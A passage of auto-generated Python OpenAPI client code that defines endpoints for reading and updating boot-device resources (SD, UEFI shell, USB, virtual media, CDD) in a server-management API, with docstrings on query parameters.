top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootSdDeviceResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_boot_sd_device_list = _Endpoint(
settings={
'response_type': (BootSdDeviceResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/SdDevices',
'operation_id': 'get_boot_sd_device_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_sd_device_list
)
def __get_boot_uefi_shell_device_by_moid(
self,
moid,
**kwargs
):
"""Read a 'boot.UefiShellDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_uefi_shell_device_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootUefiShellDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_boot_uefi_shell_device_by_moid = _Endpoint(
settings={
'response_type': (BootUefiShellDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/UefiShellDevices/{Moid}',
'operation_id': 'get_boot_uefi_shell_device_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_uefi_shell_device_by_moid
)
def __get_boot_uefi_shell_device_list(
self,
**kwargs
):
"""Read a 'boot.UefiShellDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_uefi_shell_device_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootUefiShellDeviceResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_boot_uefi_shell_device_list = _Endpoint(
settings={
'response_type': (BootUefiShellDeviceResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/UefiShellDevices',
'operation_id': 'get_boot_uefi_shell_device_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_uefi_shell_device_list
)
def __get_boot_usb_device_by_moid(
self,
moid,
**kwargs
):
"""Read a 'boot.UsbDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_usb_device_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootUsbDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_boot_usb_device_by_moid = _Endpoint(
settings={
'response_type': (BootUsbDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/UsbDevices/{Moid}',
'operation_id': 'get_boot_usb_device_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_usb_device_by_moid
)
def __get_boot_usb_device_list(
self,
**kwargs
):
"""Read a 'boot.UsbDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_usb_device_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootUsbDeviceResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_boot_usb_device_list = _Endpoint(
settings={
'response_type': (BootUsbDeviceResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/UsbDevices',
'operation_id': 'get_boot_usb_device_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_usb_device_list
)
def __get_boot_vmedia_device_by_moid(
self,
moid,
**kwargs
):
"""Read a 'boot.VmediaDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_vmedia_device_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootVmediaDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_boot_vmedia_device_by_moid = _Endpoint(
settings={
'response_type': (BootVmediaDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/VmediaDevices/{Moid}',
'operation_id': 'get_boot_vmedia_device_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_vmedia_device_by_moid
)
def __get_boot_vmedia_device_list(
self,
**kwargs
):
"""Read a 'boot.VmediaDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_boot_vmedia_device_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootVmediaDeviceResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_boot_vmedia_device_list = _Endpoint(
settings={
'response_type': (BootVmediaDeviceResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/VmediaDevices',
'operation_id': 'get_boot_vmedia_device_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_boot_vmedia_device_list
)
def __patch_boot_cdd_device(
self,
moid,
boot_cdd_device,
**kwargs
):
"""Update a 'boot.CddDevice' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_boot_cdd_device(moid, boot_cdd_device, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
boot_cdd_device (BootCddDevice): The 'boot.CddDevice' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BootCddDevice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['boot_cdd_device'] = \
boot_cdd_device
return self.call_with_http_info(**kwargs)
self.patch_boot_cdd_device = _Endpoint(
settings={
'response_type': (BootCddDevice,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/boot/CddDevices/{Moid}',
'operation_id': 'patch_boot_cdd_device',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'moid',
'boot_cdd_device',
'if_match',
],
'required': [
'moid',
'boot_cdd_device',
],
